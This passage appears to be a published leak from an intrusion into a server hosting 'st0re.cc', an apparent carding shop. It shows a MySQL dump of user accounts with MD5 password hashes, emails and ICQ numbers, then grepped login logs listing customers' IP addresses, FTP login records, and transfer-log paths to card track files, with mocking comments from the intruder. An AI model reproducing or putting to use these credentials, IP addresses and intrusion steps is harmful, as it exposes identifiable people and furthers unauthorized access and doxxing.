| 2aed094745c811516aea636e52015bc8 | 2010@9y.com | 10 | 0 | 0 | +| 6820 | drbob | edfff284ca91b5676d8caa85f0cfd1df | BlackDesire2 | 20 | 0 | 0 | +| 6885 | Lankabel | 4297f44b13955235245b2497399d7a93 | 123@123.123 | 35 | 0 | | +| 6953 | fr34c10 | 200820e3227815ed1756a6b531e7e0d2 | festner@mail | 10 | 0 | | +| 7040 | Cysis | 984c8c7b5d1d358c1470b1a2f81cdd3b | 4216SD@gmail | 40 | 0 | | +| 7042 | Fire | e94e346e5bb49449d6d607939ddbf63c | cyler@hotmai | 8 | 0 | | +| 7072 | drbob100 | 8faddb27516de448b4f7a434b5a7130a | Blackddeess@ | 20 | 0 | | +| 7105 | runner91 | 8a7d489dbea2c6d8ad710b47ea68bc05 | malli-2006@w | 7.5 | 0 | | +| 7190 | jacov | f30d05ead11bea743d583e4282e304f6 | n0b0dy.fh@we | 7 | 0 | | +| 7193 | kratos1 | 59779937922f0264885e4f871257be48 | fgikto@googl | 7 | 0 | | +| 7227 | s30s | 5103c1995af9f7fc6751de332bcfdfd3 | xc0ree@cust. | 7 | 0 | | +| 7603 | fws | 73cb82e5496bfc9e4a6bc70ea2826e56 | ao@f-ws.de | 32 | 0 | | +| 7803 | CodeRed | e89b7c5cc238c5871ceeafe46d3d3154 | CodeRed94@ho | 6 | 0 | | +| 7827 | liviu | 65399351c23e646ae6ad68c938015c14 | zut@wet.de | 6 | 0 | | +| 7887 | Anything | 9f4633f632153c74bcddcbf9c1d2fbed | 113377 | 9 | 0 | | +| 7899 | piren20 | cc03e747a6afbbcbf8be7668acfebee5 | mh.zeh@web.d | 10 | 0 | | +| 7925 | sdffsf | c02711d20a521eb8d1e5aeefb6bbecab | dfds@sd.de | 7 | 0 | | +| 8114 | sTiNN | 745c0ccdb25262e3a17afe9fd6456a5c | stinn@live.d | 6 | 0 | | +| 8122 | bigdady | 9933fb405b690fb59015b8981e09e671 | 621178350 | 10 | 0 | | +| 8249 | freestyl | 2968da776da97fdd7d4910189411804e | as7da9d@gmx. | 20 | 0 | | +| 8324 | kamel | e73e1bd2feb22b75c0ec0cacfd0b9d25 | 81023871 | 13 | 0 | | +| 8340 | iphonejumper | 5db9e40fd1ae010e435884cedbfde349 | | 7 | 0 | | +| 8408 | joe321 | f36e8a3b77970d55a984672972555c40 | | 35 | 0 | | +| 8414 | Crackfox | 10b43971a8295f3720f38fbcdd9d6ac6 | | 6 | 0 | | +| 8470 | shoxx12 | 1e45690858e3dfdeebbd67eb5db2653b | | 5.5 | 0 | | +| 8493 | alexander | dd22141acb5ea065acd5ed773729c98f | 000000 | 30 | 0 | | +| 8554 | hurens0hn | 08ba21f5a9f192e3114ce9c3d29c0f8f | 383051368 | 25 | 0 | | +| 8580 | Bester12 | 8e2a99e1e5e356f5b9b874c8d9d83c79 | 456 | 40 | 0 | | +| 8627 | Kleedyyy | 8d0c8f9d1a9539021fda006427b993b9 | | 7 | 0 | | +| 8645 | Energie | ea110dfdeb4b966c81f7d786df7b1192 | | 7 | 0 | | +| 8691 | JimPanse | f56a8901702b2c279c065f2ca15890ec | | 8 | 0 | | +| 8744 | cubee | 4a3ef4824d67af46ea57a39b72dea7df | | 7 | 0 | | +| 8762 | Dodel | 5657c76ad9a05ea0d9899f94dc4121e9 | | 8 | 0 | | +| 8826 | kuni77 | 22f3555c832cde0134c65e9cb44424ee | 615664295 | 7 | 0 | | +| 8866 | sysfuck | 95a3d9c2bce545f46bc54d8a750438b1 | | 17.5 | 0 | | +| 8879 | payment | ed8539ed5fe17d4dc3a18058831fb9bd | | 10 | 0 | | +| 8890 | PolskaDumny | c288a40b22e236022e43f96cf7bab952 | 165-034 | 8.5 | 0 | | +| 8933 | Dubstep | 3116ccacabe066ce091b171347fca80d | 427-073-373 | 25.2 | 0 | | +| 8960 | Hotter | 0981ee032a8e8af483dc24390916c737 | 282979840 | 7.5 | 0 | | +| 8969 | network44 | 44252cf93dd7a73ecc031f8363a26459 | 618445 | 10 | 0 | | +| 9010 | sey | f2f6ca16e070070fc5465ab4209586b5 | | 10 | 0 | | +| 9094 | MrPataa | 9c7b04e137048c6dc5bc2dae0f78bf68 | | 10 | 0 | | +| 9122 | Semtex99 | 9ca40c627bb00f08347cf336fb09011b | | 9 | 0 | | +| 9183 | trainee | a2147086850706ecb2b6f2919fed8e40 | 350610 | 7 | 0 | | +| 9216 | opfa | 01fc7192adba9cbba78b612ebeca6b66 | | 11 | 0 | | +| 9223 | ivory | 00b86e77b9f76fc1f466555b6af345f8 | | 10 | 0 | | +| 9253 | blur121 | 7e4ea1bf5ca4e36d14e6296e485970f2 | | 10 | 0 | | +| 9590 | kani2012 | ec11aacc5832b63f02f1269e89d3cdd7 | 858223 | 7 | 0 | | +| 9269 | drm1hy | c6cb19878e6a335d4fabb115ca8e3605 | | 24 | 0 | | +| 9273 | TrOvEjAr | 9378884c5f76bf23f5aaedd1035017ba | 234307423 | 20 | 0 | | +| 9275 | gist505 | fcdd4eae6aff919545ff68b6e3943b91 | | 8.98 | 0 | | +| 9298 | mrgreen | 824a67f29e97b8798a9df7f00189f3e1 | | 35 | 0 | | +| 9307 | GStar | 2472ee727ed8de9a818fc657a6895646 | | 10 | 0 | | +| 9310 | Domi93 | b36d331451a61eb2d76860e00c347396 | | 8 | 0 | | +| 9348 | pwned | 530ea1472e71035353d32d341ecf6343 | | 6.5 | 0 | | +| 9357 | darkt0wn | a56b6119d6c8be8e2d0d25bcfdca25c6 | | 10 | 0 | | +| 9375 | optik | d6ae345d39ca27dcc9c8e9c30a814041 | | 7 | 0 | | +| 9397 | U3 | 93327f2856df1105a1318895ac44e684 | 645458882 | 20.2 | 0 | | +| 9410 | mule22 | d27c8e6c3222ea5da09eb7f0f9d56818 | | 7 | 0 | | +| 9448 | BL4cKKS | cdbec512b7a848722346013aa3e44f8b | | 7 | 0 | | +| 9508 | PEPPEP | 6ec176f463121c7a1fc2f442ba22e937 | | 6 | 0 | | +| 9534 | Cardercc | 461ae6b500f5802d4d52b34643cdcc6e | | 11 | 0 | | +| 9599 | nolandro | 78f5cf8d0ee4f6b1e612a36954c1254d | | 50 | 0 | | +| 9600 | KoKaiiiN | dc74e595f9938b1ea1f1a078ae154949 | 363727670 | 6 | 0 | | +| 9618 | D3DMan | e78e0c9c18a6490ef56c3ffe837e0fca | | 10.5 | 0 | | +| 9621 | Abdulleben | 25d55ad283aa400af464c76d713c07ad | | 6.5 | 0 | | +| 9631 | sexonthebeach | 2dfbaaecbe98198ace8c554cc426b6d4 | | 44 | 0 | | +| 9701 | heiko4321 | 12a6265a271b7b23e943f5986d80d190 | | 7.5 | 0 | | +| 9726 | albozz | d41d8cd98f00b204e9800998ecf8427e | | 18 | 0 | | +| 9729 | Spexti | 4dfd9542414fed623b432aee923618d0 | | 6 | 0 | | +| 9791 | Bastler | a278ec2edc9105bd52fe62254522ecd4 | | 20 | 0 | | +| 9820 | vima | f3674879f5e18c7989e02235da302cc9 | | 20 | 0 | | +| 9822 | xNiightx | ef605602b07ae6b27054649d92e28b3e | 474300093 | 19 | 0 | | +| 9824 | bergwerk | c4fd4f3a6e0f9ccbc309a510a7efbad4 | | 12 | 0 | | +| 9948 | funny333 | 56a876cce8c5d91ed47db1b742573d36 | | 17.5 | 0 | | +| 9966 | Friedrich | 28acec923aa820ebbe028955a5a46356 | ja | 7 | 0 | | +| 10035 | Auzodiox | 286119328282d5d64cf1a3a02aba6316 | | 15 | 0 | | +| 10003 | donjuan | 6d11921056f42e148b13a528c82d174e | | 5.5 | 0 | | +| 10005 | hajo22 | 566a1fc42bc3fa17a3920221d2b24d34 | | 6 | 0 | | +| 10032 | golem | 62650cd9a5fb136dc137b155e4ae6f2a | | 15.5 | 0 | | +| 10033 | blood | 42ee64c24d1efcc4c1916074461854f3 | | 10 | 0 | | +| 10051 | Technoboom | 77711870d494d022654bcf842b603467 | | 7 | 0 | | +| 10217 | LiBeRtY1338 | d41d8cd98f00b204e9800998ecf8427e | 634365955 | 9.1 | 0 | | +| 10085 | mo100 | 7cc5a8be611ccce374885048bc2a4848 | | 32.5 | 0 | | +| 10575 | Twix2010 | 75a593a34aa5ba8e5e5788b7c899802e | | 7 | 0 | | +| 10216 | Spagel | 22243bfba05b9715e6303dacf7f66c90 | | 30 | 0 | | +| 10391 | DerHase | e99a18c428cb38d5f260853678922e03 | | 7.5 | 0 | | +| 10290 | samsamsam3 | 03f828f4b26b4ebab502c56a78cc0580 | 600148357 | 70 | 0 | | +| 10304 | dasfrek | de68fbe75420c572d172d456ec9a48b3 | 158204790 | 13 | 0 | | +| 10402 | Kevko | a0017f523db6e51a75f02647a89280bd | 480179 | 9 | 0 | | +| 10440 | ahm123 | 97c45c9bb4cea4d08721d101388578bb | | 7 | 0 | | +| 10555 | homer | f54146a3fc82ab17e5265695b23f646b | | 9 | 0 | | +| 10557 | ccmajor | 1fafd7a63f5980302a5cdaa790988b7b | 158545 | 10 | 0 | | ++--------+---------------+----------------------------------+--------------+---------+--------+---+ +169 rows in set (0.01 sec) + +mysql> Aborted + +# cd /var/log/httpd + +# Some recent ip adresses?^C + +# grep "st0re.cc.*POST.*login_do.php" httpd_20110930_* httpd_access.log +httpd_20110930_a.log:st0re.cc 91.23.167.77 2 30.09.11 03:30:01 "POST /login_do.php HTTP/1.0" 47627 637 341 +httpd_20110930_a.log:st0re.cc 87.168.17.156 2 30.09.11 04:13:28 "POST /login_do.php HTTP/1.0" 8509 726 323 +httpd_20110930_a.log:st0re.cc 178.162.135.234 2 30.09.11 04:52:16 "POST /login_do.php HTTP/1.0" 8323 705 323 +httpd_20110930_a.log:st0re.cc 80.142.47.156 2 30.09.11 05:06:21 "POST /login_do.php HTTP/1.0" 8148 634 323 +httpd_20110930_a.log:st0re.cc 212.150.184.230 2 30.09.11 08:19:53 "POST /login_do.php HTTP/1.0" 8213 652 323 +httpd_20110930_a.log:st0re.cc 2.200.120.131 2 30.09.11 09:56:50 "POST /login_do.php HTTP/1.0" 8549 669 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 10:47:44 "POST /login_do.php HTTP/1.0" 8941 583 323 +httpd_20110930_a.log:st0re.cc 95.211.13.145 2 30.09.11 10:50:13 "POST /login_do.php HTTP/1.0" 8095 635 323 +httpd_20110930_a.log:st0re.cc 80.226.24.8 2 30.09.11 11:18:30 "POST /login_do.php HTTP/1.0" 8314 670 323 +httpd_20110930_a.log:st0re.cc 79.253.2.25 2 30.09.11 11:27:54 "POST /login_do.php HTTP/1.0" 8574 720 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 11:32:49 "POST /login_do.php HTTP/1.0" 8150 583 323 +httpd_20110930_a.log:st0re.cc 77.176.68.228 2 30.09.11 13:01:42 "POST /login_do.php HTTP/1.0" 8211 641 3411 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 13:19:38 "POST /login_do.php HTTP/1.0" 8286 583 323 +httpd_20110930_a.log:st0re.cc 188.136.8.225 2 30.09.11 13:56:34 "POST /login_do.php HTTP/1.0" 8711 642 323 +httpd_20110930_a.log:st0re.cc 92.241.168.24 2 30.09.11 14:31:08 "POST /login_do.php HTTP/1.0" 8377 630 323 +httpd_20110930_a.log:st0re.cc 84.140.101.35 2 30.09.11 14:51:37 "POST /login_do.php HTTP/1.0" 8876 723 323 +httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 15:34:17 "POST /login_do.php HTTP/1.0" 9479 788 341 +httpd_20110930_a.log:st0re.cc 92.201.119.237 2 30.09.11 15:45:12 "POST /login_do.php HTTP/1.0" 8372 641 323 +httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 15:57:19 "POST /login_do.php HTTP/1.0" 8163 633 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:04:08 "POST /login_do.php HTTP/1.0" 8246 583 323 +httpd_20110930_a.log:st0re.cc 88.72.19.192 2 30.09.11 16:15:47 "POST /login_do.php HTTP/1.0" 8768 630 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:22:46 "POST /login_do.php HTTP/1.0" 8777 705 341 +httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:24:21 "POST /login_do.php HTTP/1.0" 272729 732 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:26:26 "POST /login_do.php HTTP/1.0" 8575 723 323 +httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 16:30:04 "POST /login_do.php HTTP/1.0" 8150 787 323 +httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 16:30:24 "POST /login_do.php HTTP/1.0" 8242 636 323 +httpd_20110930_a.log:st0re.cc 178.7.135.0 2 30.09.11 16:33:20 "POST /login_do.php HTTP/1.0" 8378 648 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:43:58 "POST /login_do.php HTTP/1.0" 8185 583 323 +httpd_20110930_a.log:st0re.cc 92.241.164.197 2 30.09.11 16:44:05 "POST /login_do.php HTTP/1.0" 8263 654 323 +httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:48:12 "POST /login_do.php HTTP/1.0" 8888 761 323 +httpd_20110930_a.log:st0re.cc 46.115.16.29 2 30.09.11 16:55:14 "POST /login_do.php HTTP/1.0" 8958 718 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:55:44 "POST /login_do.php HTTP/1.0" 8141 723 323 +httpd_20110930_a.log:st0re.cc 88.76.37.149 2 30.09.11 16:59:33 "POST /login_do.php HTTP/1.0" 8468 643 323 +httpd_20110930_a.log:st0re.cc 77.186.7.122 2 30.09.11 17:05:15 "POST /login_do.php HTTP/1.0" 8506 632 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:05:35 "POST /login_do.php HTTP/1.0" 8739 583 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 17:06:11 "POST /login_do.php HTTP/1.0" 8214 732 323 +httpd_20110930_a.log:st0re.cc 91.53.197.228 2 30.09.11 17:07:00 "POST /login_do.php HTTP/1.0" 8094 787 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:09:32 "POST /login_do.php HTTP/1.0" 8230 583 323 +httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 17:12:29 "POST /login_do.php HTTP/1.0" 8606 640 323 +httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 17:15:16 "POST /login_do.php HTTP/1.0" 8181 633 323 +httpd_20110930_a.log:st0re.cc 84.177.153.224 2 30.09.11 17:17:27 "POST /login_do.php HTTP/1.0" 8550 650 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:23:17 "POST /login_do.php HTTP/1.0" 8164 583 323 +httpd_20110930_a.log:st0re.cc 92.224.62.134 2 30.09.11 17:25:51 "POST /login_do.php HTTP/1.0" 8164 642 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:50:25 "POST /login_do.php HTTP/1.0" 8288 583 323 +httpd_20110930_a.log:st0re.cc 178.162.135.66 2 30.09.11 17:56:45 "POST /login_do.php HTTP/1.0" 8871 612 323 +httpd_20110930_a.log:st0re.cc 77.8.111.185 2 30.09.11 18:00:22 "POST /login_do.php HTTP/1.0" 8204 635 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:06:05 "POST /login_do.php HTTP/1.0" 8037 583 323 +httpd_20110930_a.log:st0re.cc 178.86.4.72 2 30.09.11 18:09:59 "POST /login_do.php HTTP/1.0" 8348 640 323 +httpd_20110930_a.log:st0re.cc 87.156.226.177 2 30.09.11 18:15:41 "POST /login_do.php HTTP/1.0" 8184 650 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:32:35 "POST /login_do.php HTTP/1.0" 13208 583 323 +httpd_20110930_a.log:st0re.cc 62.177.139.171 2 30.09.11 18:43:36 "POST /login_do.php HTTP/1.0" 8538 612 323 +httpd_20110930_a.log:st0re.cc 188.99.237.187 2 30.09.11 18:44:23 "POST /login_do.php HTTP/1.0" 8195 631 323 +httpd_20110930_a.log:st0re.cc 84.144.24.26 2 30.09.11 18:46:44 "POST /login_do.php HTTP/1.0" 8378 733 323 +httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:58:16 "POST /login_do.php HTTP/1.0" 8107 583 323 +httpd_20110930_a.log:st0re.cc 88.128.93.67 2 30.09.11 19:14:31 "POST /login_do.php HTTP/1.0" 8347 741 323 +httpd_20110930_a.log:st0re.cc 84.159.35.59 2 30.09.11 19:28:20 "POST /login_do.php HTTP/1.0" 8304 644 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 19:35:08 "POST /login_do.php HTTP/1.0" 8222 732 323 +httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 19:43:28 "POST /login_do.php HTTP/1.0" 8076 641 323 +httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 19:45:35 "POST /login_do.php HTTP/1.0" 8195 639 323 +httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 19:49:23 "POST /login_do.php HTTP/1.0" 8152 581 323 +httpd_20110930_a.log:st0re.cc 87.156.29.114 2 30.09.11 19:52:03 "POST /login_do.php HTTP/1.0" 8481 723 323 +httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:21 "POST /login_do.php HTTP/1.0" 8568 794 341 +httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:34 "POST /login_do.php HTTP/1.0" 9612 793 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 20:10:43 "POST /login_do.php HTTP/1.0" 8277 723 323 +httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:14:09 "POST /login_do.php HTTP/1.0" 8427 581 323 +httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:15:41 "POST /login_do.php HTTP/1.0" 8416 625 341 +httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:16:47 "POST /login_do.php HTTP/1.0" 8292 641 323 +httpd_20110930_a.log:st0re.cc 213.163.65.50 2 30.09.11 20:19:02 "POST /login_do.php HTTP/1.0" 8270 629 323 +httpd_20110930_a.log:st0re.cc 84.166.216.59 2 30.09.11 20:36:40 "POST /login_do.php HTTP/1.0" 8410 721 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 20:51:21 "POST /login_do.php HTTP/1.0" 8349 732 323 +httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:54:58 "POST /login_do.php HTTP/1.0" 8343 581 323 +httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 20:56:17 "POST /login_do.php HTTP/1.0" 8158 641 323 +httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 21:14:05 "POST /login_do.php HTTP/1.0" 8708 641 323 +httpd_20110930_a.log:st0re.cc 84.189.234.204 2 30.09.11 21:17:37 "POST /login_do.php HTTP/1.0" 8194 671 323 +httpd_20110930_a.log:st0re.cc 87.139.98.60 2 30.09.11 21:23:18 "POST /login_do.php HTTP/1.0" 8082 644 323 +httpd_20110930_a.log:st0re.cc 109.236.86.130 2 30.09.11 21:35:53 "POST /login_do.php HTTP/1.0" 8154 645 323 +httpd_20110930_a.log:st0re.cc 93.186.200.12 2 30.09.11 21:45:37 "POST /login_do.php HTTP/1.0" 8409 627 341 +httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 21:46:22 "POST /login_do.php HTTP/1.0" 8157 639 323 +httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:30 "POST /login_do.php HTTP/1.0" 8119 622 341 +httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:37 "POST /login_do.php HTTP/1.0" 8241 622 323 +httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 21:53:11 "POST /login_do.php HTTP/1.0" 8070 723 323 +httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 21:53:33 "POST /login_do.php HTTP/1.0" 8254 636 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 22:07:29 "POST /login_do.php HTTP/1.0" 8648 732 323 +httpd_20110930_a.log:st0re.cc 89.15.88.227 2 30.09.11 22:19:27 "POST /login_do.php HTTP/1.0" 8205 635 341 +httpd_20110930_a.log:st0re.cc 80.239.242.78 2 30.09.11 22:21:00 "POST /login_do.php HTTP/1.0" 8402 646 323 +httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:31:06 "POST /login_do.php HTTP/1.0" 8479 721 341 +httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:33:29 "POST /login_do.php HTTP/1.0" 8240 720 323 +httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 22:33:49 "POST /login_do.php HTTP/1.0" 14741 636 323 +httpd_20110930_a.log:st0re.cc 77.24.94.72 2 30.09.11 22:34:14 "POST /login_do.php HTTP/1.0" 8203 663 341 +httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:30 "POST /login_do.php HTTP/1.0" 8304 729 341 +httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:38 "POST /login_do.php HTTP/1.0" 8228 730 323 +httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 22:42:38 "POST /login_do.php HTTP/1.0" 8094 640 323 +httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 23:08:46 "POST /login_do.php HTTP/1.0" 8207 732 323 +httpd_20110930_a.log:st0re.cc 89.204.153.246 2 30.09.11 23:10:14 "POST /login_do.php HTTP/1.0" 8285 696 323 +httpd_20110930_a.log:st0re.cc 79.192.107.57 2 30.09.11 23:20:54 "POST /login_do.php HTTP/1.0" 8307 639 323 +httpd_20110930_a.log:st0re.cc 93.196.21.139 2 30.09.11 23:29:34 "POST /login_do.php HTTP/1.0" 8856 633 323 +httpd_20110930_a.log:st0re.cc 2.213.95.13 2 30.09.11 23:50:22 "POST /login_do.php HTTP/1.0" 8379 633 323 +httpd_20110930_a.log:st0re.cc 82.83.112.126 2 30.09.11 23:56:18 "POST /login_do.php HTTP/1.0" 8721 744 323 +httpd_20110930_a.log:st0re.cc 77.20.159.112 2 01.10.11 00:20:55 "POST /login_do.php HTTP/1.0" 8354 643 323 +httpd_20110930_a.log:st0re.cc 178.9.168.231 2 01.10.11 01:13:45 "POST /login_do.php HTTP/1.0" 9722 729 341 +httpd_20110930_a.log:st0re.cc 84.59.159.134 2 01.10.11 01:35:23 "POST /login_do.php HTTP/1.0" 8207 646 323 +httpd_20110930_a.log:st0re.cc 87.139.98.60 2 01.10.11 01:48:07 "POST /login_do.php HTTP/1.0" 9020 644 323 +httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:56:01 "POST /login_do.php HTTP/1.0" 8930 640 341 +httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:58:53 "POST /login_do.php HTTP/1.0" 8227 648 341 +httpd_20110930_a.log:st0re.cc 195.71.18.209 2 01.10.11 02:40:09 "POST /login_do.php HTTP/1.0" 8594 630 323 +httpd_20110930_a.log:st0re.cc 95.118.98.231 2 01.10.11 02:47:35 "POST /login_do.php HTTP/1.0" 8143 735 341 +httpd_20110930_a.log:st0re.cc 95.222.50.203 2 01.10.11 03:00:42 "POST /login_do.php HTTP/1.0" 8455 637 323 +httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:18 "POST /login_do.php HTTP/1.0" 8322 648 341 +httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:30 "POST /login_do.php HTTP/1.0" 1543 648 341 +httpd_access.log:st0re.cc 84.189.234.204 2 01.10.11 03:56:19 "POST /login_do.php HTTP/1.0" 8108 671 323 +httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:31 "POST /login_do.php HTTP/1.0" 8725 629 341 +httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:57 "POST /login_do.php HTTP/1.0" 8745 627 323 +httpd_access.log:st0re.cc 84.74.179.83 2 01.10.11 05:17:41 "POST /login_do.php HTTP/1.0" 8227 724 323 +httpd_access.log:st0re.cc 66.176.9.110 2 01.10.11 06:22:46 "POST /login_do.php HTTP/1.0" 8182 889 323 +httpd_access.log:st0re.cc 84.171.65.229 2 01.10.11 11:16:40 "POST /login_do.php HTTP/1.0" 10603 646 323 +httpd_access.log:st0re.cc 213.135.18.45 2 01.10.11 11:32:59 "POST /login_do.php HTTP/1.0" 8670 581 323 +httpd_access.log:st0re.cc 92.224.58.242 2 01.10.11 11:59:27 "POST /login_do.php HTTP/1.0" 8330 633 323 +httpd_access.log:st0re.cc 115.184.3.252 2 01.10.11 12:12:22 "POST /login_do.php HTTP/1.0" 8176 699 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 12:41:47 "POST /login_do.php HTTP/1.0" 8422 787 323 +httpd_access.log:st0re.cc 89.0.20.128 2 01.10.11 13:00:16 "POST /login_do.php HTTP/1.0" 8213 647 323 +httpd_access.log:st0re.cc 85.17.97.27 2 01.10.11 13:31:59 "POST /login_do.php HTTP/1.0" 8667 634 341 +httpd_access.log:st0re.cc 212.150.184.230 2 01.10.11 13:37:20 "POST /login_do.php HTTP/1.0" 8082 652 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:48:36 "POST /login_do.php HTTP/1.0" 8041 787 323 +httpd_access.log:st0re.cc 80.142.41.35 2 01.10.11 13:56:41 "POST /login_do.php HTTP/1.0" 8142 675 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:58:43 "POST /login_do.php HTTP/1.0" 1754 787 323 +httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:46 "POST /login_do.php HTTP/1.0" 8161 636 341 +httpd_access.log:st0re.cc 178.202.68.98 2 01.10.11 14:09:49 "POST /login_do.php HTTP/1.0" 8236 636 323 +httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:52 "POST /login_do.php HTTP/1.0" 8429 644 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:30:23 "POST /login_do.php HTTP/1.0" 8060 794 341 +httpd_access.log:st0re.cc 87.122.41.84 2 01.10.11 14:42:56 "POST /login_do.php HTTP/1.0" 8176 633 323 +httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:45:00 "POST /login_do.php HTTP/1.0" 1750 787 323 +httpd_access.log:st0re.cc 92.224.11.28 2 01.10.11 15:03:01 "POST /login_do.php HTTP/1.0" 8030 664 341 +httpd_access.log:st0re.cc 88.74.202.98 2 01.10.11 15:45:47 "POST /login_do.php HTTP/1.0" 8167 661 323 +httpd_access.log:st0re.cc 95.118.133.136 2 01.10.11 15:50:25 "POST /login_do.php HTTP/1.0" 8025 641 323 +httpd_access.log:st0re.cc 217.79.178.233 2 01.10.11 15:52:07 "POST /login_do.php HTTP/1.0" 8115 726 323 +httpd_access.log:st0re.cc 77.188.205.152 2 01.10.11 15:56:27 "POST /login_do.php HTTP/1.0" 8137 643 323 +httpd_access.log:st0re.cc 87.122.34.237 2 01.10.11 15:58:01 "POST /login_do.php HTTP/1.0" 8125 635 323 +httpd_access.log:st0re.cc 212.117.165.197 2 01.10.11 16:25:15 "POST /login_do.php HTTP/1.0" 8005 646 323 +httpd_access.log:st0re.cc 46.20.44.58 2 01.10.11 16:26:19 "POST /login_do.php HTTP/1.0" 7911 638 341 +httpd_access.log:st0re.cc 93.223.63.24 2 01.10.11 16:39:27 "POST /login_do.php HTTP/1.0" 8066 631 323 +httpd_access.log:st0re.cc 77.20.159.112 2 01.10.11 16:47:10 "POST /login_do.php HTTP/1.0" 8025 643 323 +httpd_access.log:st0re.cc 109.236.86.130 2 01.10.11 16:59:19 "POST /login_do.php HTTP/1.0" 1524 719 323 +httpd_access.log:st0re.cc 88.69.129.69 2 01.10.11 17:01:04 "POST /login_do.php HTTP/1.0" 8045 721 323 +httpd_access.log:st0re.cc 62.141.46.134 2 01.10.11 17:06:19 "POST /login_do.php HTTP/1.0" 8112 645 323 +httpd_access.log:st0re.cc 93.133.47.182 2 01.10.11 17:14:46 "POST /login_do.php HTTP/1.0" 8307 622 341 + +# And who is the guy behind that crap?^C + +# last | grep mmgen +mmgen ftp 212.150.184.230 Mon Oct 3 16:58 - 16:59 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:57 - 16:58 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:43 - 16:44 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:10 - 16:11 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 16:10 - 16:13 (00:03) +mmgen ftp 212.150.184.230 Mon Oct 3 16:04 - 16:05 (00:01) +mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 16:00 (00:05) +mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 15:54 (00:00) +mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 15:57 (00:03) + +# Israel does not look that interesting...^C + +# grep mgen.*78 /var/log/proftpd-transfer.log +Sun Dec 19 14:56:29 2010 0 92.241.164.197 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180253783625111 b _ d r mmgen ftp 0 * c +Fri Jan 14 23:16:40 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180257808454951 a _ d r mmgen ftp 0 * c +Sun Jan 23 16:36:30 2011 0 212.117.174.26 